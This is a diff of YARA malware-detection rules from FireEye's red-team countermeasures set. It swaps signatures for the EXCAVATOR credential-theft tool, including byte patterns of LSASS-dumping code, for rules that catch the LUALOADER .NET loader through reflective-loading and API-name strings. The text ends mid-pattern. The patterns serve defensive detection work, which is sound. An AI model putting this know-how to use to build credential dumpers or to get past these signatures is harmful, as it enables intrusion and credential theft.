-		$dump = { BA FD 03 00 AC [0-8] 41 B8 1F 00 10 00 48 8B ?? FF 15 [4] 85 C0 0F 85 [2] 00 00 [0-2] 48 8D 05 [5] 89 ?? 24 30 ( C7 44 24 28 80 00 00 00 48 8D 0D ?? ?? ?? ?? | 48 8D 0D ?? ?? ?? ?? C7 44 24 28 80 00 00 00 ) 45 33 C9 [0-5] 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 [0-10] FF 15 [4] 48 8B ?? 48 83 F8 FF ( 74 | 0F 84 ) [1-4] 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 30 ( 41 B9 02 00 00 00 | 44 8D 4D 02 ) ?? 89 ?? 24 28 4C 8B ?? 8B [2] 89 ?? 24 20 FF 15 [4] 48 8B ?? FF 15 [4] 48 8B ?? FF 15 [4] FF 15 [4] 48 8B 54 24 ?? 48 8B C8 FF 15 }
-		$lsass = { 6C 73 61 73 [6] 73 2E 65 78 [6] 65 }
+		$ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00"
+		$ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00"
+		$ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00"
+		$ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide
+		$ss5 = "1F 8B 08 00 00 00 00 00" wide
+		$ss6 = "\x00LoadLibrary\x00"
+		$ss7 = "\x00GetProcAddress\x00"
+		$ss8 = "\x00VirtualProtect\x00"
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_LUALOADER_1 : FILE
 {
 	meta:
-		description = "This rule looks for the binary signature of the 'Inject' method found in the main Excavator PE."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'lualoader' project."
 		author = "FireEye"
-		id = "7cabc230-e55b-5096-996a-b6a8c9693bdc"
+		id = "e8480cf8-1852-5572-8e92-c0ae676b7507"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_HackTool_MSIL_LUALOADER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f7d9961463b5110a3d70ee2e97842ed3"
-		logic_hash = "bf4b776f34a1a9aa5438504f63a63ef452a747363de3b70cec52145d777055bd"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "7e9f9836ec91aa66c8779588cfceff718487f0cb5048d17538c947aba687a4cf"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 4
+		rev = 3
 
 	strings:
-		$bytes1 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 20 01 00 00 48 8B 05 75 BF 01 00 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 8D 0D 12 A1 01 00 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 00 FF 15 CB 1F 01 00 48 85 C0 75 1B FF 15 80 1F 01 00 8B D0 48 8D 0D DF A0 01 00 E8 1A FF FF FF 33 C0 E9 B4 02 00 00 48 8D 15 D4 A0 01 00 48 89 9C 24 30 01 00 00 48 8B C8 FF 15 4B 1F 01 00 48 8B D8 48 85 C0 75 19 FF 15 45 1F 01 00 8B D0 48 8D 0D A4 A0 01 00 E8 DF FE FF FF E9 71 02 00 00 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 45 66 66 0F 1F 84 00 00 00 00 00 48 8B 4C 24 60 FF 15 4D 1F 01 00 3B C6 74 22 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 D1 EB 0A 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A0 01 00 48 8D 05 A6 C8 01 00 B9 C8 05 00 00 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 B2 FF 15 CC 1E 01 00 4C 8D 44 24 78 BA 0A 00 00 00 48 8B C8 FF 15 01 1E 01 00 85 C0 0F 84 66 01 00 00 48 8B 4C 24 78 48 8D 45 80 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 D8 1D 01 00 85 C0 0F 84 35 01 00 00 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 50 01 FF 15 5C 1E 01 00 FF 15 06 1E 01 00 4C 8B 44 24 68 33 D2 48 8B C8 FF 15 DE 1D 01 00 48 8B F8 48 85 C0 0F 84 FF 00 00 00 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 50 01 FF 15 25 1E 01 00 85 C0 0F 84 E2 00 00 00 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 6C 1D 01 00 85 C0 0F 84 B1 00 00 00 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C 8D 05 58 39 03 00 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 44 24 30 04 00 08 00 44 89 74 24 28 4C 89 74 24 20 FF 15 0C 1D 01 00 85 C0 74 65 48 8B 4C 24 70 8B 5D 98 FF 15 1A 1D 01 00 48 8B 4D 88 FF 15 10 1D 01 00 48 8B 4D 90 FF 15 06 1D 01 00 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 4E 1D 01 00 48 8B D8 48 85 C0 74 2B 48 8B C8 E8 4E 06 00 00 48 85 C0 74 1E BA FF FF FF FF 48 8B C8 FF 15 3B 1D 01 00 48 8B CB FF 15 CA 1C 01 00 B8 01 00 00 00 EB 24 FF 15 DD 1C 01 00 8B D0 48 8D 0D 58 9E 01 00 E8 77 FC FF FF 48 85 FF 74 09 48 8B CF FF 15 A9 1C 01 00 33 C0 48 8B 9C 24 30 01 00 00 48 8B 4D 10 48 33 CC E8 03 07 00 00 4C 8D 9C 24 20 01 00 00 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
-		$bytes2 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
-		$bytes3 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
-		$bytes4 = { 48 89 74 24 ?? 48 89 7C 24 ?? 4C 89 74 24 ?? 55 48 8D 6C 24 ?? 48 81 EC 20 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 45 ?? 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 ?? 48 8D 0D ?? ?? ?? ?? 4C 89 74 24 ?? 0F 11 45 ?? 41 8B FE 4C 89 74 24 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 ?? 48 89 44 24 ?? 66 0F 6F 15 ?? ?? 01 00 48 8D 05 ?? ?? ?? ?? B9 C8 05 00 00 90 F3 0F 6F 40 ?? 48 8D 40 ?? 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? F3 0F 6F 40 ?? 66 0F EF C2 F3 0F 7F 40 ?? 48 83 E9 01 75 ?? FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 45 ?? 41 B9 02 00 00 00 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 02 00 00 00 41 8D 51 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 48 8B C8 41 8D 50 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 ?? 4C 8D 4C 24 ?? 4C 89 74 24 ?? 33 D2 41 B8 00 00 02 00 48 C7 44 24 ?? 08 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 45 ?? 48 89 7D ?? 48 89 44 24 ?? 45 33 C9 4C 89 74 24 ?? 33 D2 4C 89 74 24 ?? C7 44 24 ?? 04 00 08 00 44 89 74 24 ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 8B 5D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA FF FF FF FF 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 73 ?? 49 8B 7B ?? 4D 8B 73 ?? 49 8B E3 5D C3 }
+		$typelibguid0 = "8b546b49-2b2c-4577-a323-76dc713fe2ea" ascii nocase wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of ( $bytes* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_2 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_1 : FILE
 {
 	meta:
-		description = "This rule looks for the binary signature of the routine that calls PssFreeSnapshot found in the Excavator-Reflector DLL."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "89037b9a-78b0-5a8c-bb60-3d54842d81e1"
-		date = "2020-12-08"
-		modified = "2020-12-09"
+		id = "970a869e-bd69-5609-bb8d-77bfa78b0630"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_2.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6a9a114928554c26675884eeb40cc01b"
-		logic_hash = "408e8862f0c470105648fdba00dc5531ffcd739fa544f89acb70f0fa1b105c03"
+		logic_hash = "2d73d434ac39ebde990aca817a54208cd04bfbce33f1bcadcf48a50d9389658c"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		rev = 3
 
 	strings:
-		$bytes1 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A0 01 00 00 48 8B 05 4C 4A 01 00 48 33 C4 48 89 85 90 00 00 00 BA 50 00 00 00 C7 05 CB 65 01 00 43 00 3A 00 66 89 15 EC 65 01 00 4C 8D 44 24 68 48 8D 15 D8 68 01 00 C7 05 B2 65 01 00 5C 00 57 00 33 C9 C7 05 AA 65 01 00 69 00 6E 00 C7 05 A4 65 01 00 64 00 6F 00 C7 05 9E 65 01 00 77 00 73 00 C7 05 98 65 01 00 5C 00 4D 00 C7 05 92 65 01 00 45 00 4D 00 C7 05 8C 65 01 00 4F 00 52 00 C7 05 86 65 01 00 59 00 2E 00 C7 05 80 65 01 00 44 00 4D 00 C7 05 72 68 01 00 53 00 65 00 C7 05 6C 68 01 00 44 00 65 00 C7 05 66 68 01 00 42 00 75 00 C7 05 60 68 01 00 47 00 50 00 C7 05 5A 68 01 00 72 00 69 00 C7 05 54 68 01 00 56 00 69 00 C7 05 4E 68 01 00 4C 00 45 00 C7 05 48 68 01 00 67 00 65 00 C7 05 12 67 01 00 6C 73 61 73 C7 05 0C 67 01 00 73 2E 65 78 C6 05 09 67 01 00 65 FF 15 63 B9 00 00 45 33 F6 85 C0 74 66 48 8B 44 24 68 48 89 44 24 74 C7 44 24 70 01 00 00 00 C7 44 24 7C 02 00 00 00 FF 15 A4 B9 00 00 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF 15 1A B9 00 00 85 C0 74 30 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF 15 EF B8 00 00 FF 15 11 B9 00 00 48 8B 4C 24 48 FF 15 16 B9 00 00 48 89 9C 24 B0 01 00 00 48 8D 0D BF 2E 01 00 48 89 B4 24 B8 01 00 00 4C 89 74 24 40 FF 15 1C B9 00 00 48 85 C0 0F 84 B0 00 00 00 48 8D 15 AC 2E 01 00 48 8B C8 FF 15 1B B9 00 00 48 8B D8 48 85 C0 0F 84 94 00 00 00 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 06 15 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 63 66 0F 1F 44 00 00 48 8B 4C 24 40 4C 8D 45 80 41 B9 04 01 00 00 33 D2 FF 15 89 B8 00 00 48 8D 15 F2 65 01 00 48 8D 4D 80 E8 49 0F 00 00 48 85 C0 75 38 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 A3 14 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 A3 33 C0 E9 F5 00 00 00 48 8B 5C 24 40 48 8B CB FF 15 5E B8 00 00 8B F0 48 85 DB 74 E4 85 C0 74 E0 4C 8D 4C 24 50 48 89 BC 24 C0 01 00 00 BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 12 B8 00 00 85 C0 0F 85 A0 00 00 00 48 8D 05 43 FD FF FF 4C 89 74 24 30 C7 44 24 28 80 00 00 00 48 8D 0D 3F 63 01 00 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 4C 89 74 24 60 FF 15 E4 B7 00 00 48 8B F8 48 83 F8 FF 74 59 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 00 00 00 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF 15 B1 B9 00 00 48 8B CB FF 15 78 B7 00 00 48 8B CF FF 15 6F B7 00 00 FF 15 B1 B7 00 00 48 8B 54 24 50 48 8B C8 FF 15 53 B7 00 00 33 C9 FF 15 63 B7 00 00 CC 48 8B CB FF 15 49 B7 00 00 48 8B BC 24 C0 01 00 00 33 C0 48 8B B4 24 B8 01 00 00 48 8B 9C 24 B0 01 00 00 48 8B 8D 90 00 00 00 48 33 CC E8 28 00 00 00 4C 8B B4 24 C8 01 00 00 48 81 C4 A0 01 00 00 5D C3 }
-		$bytes2 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? 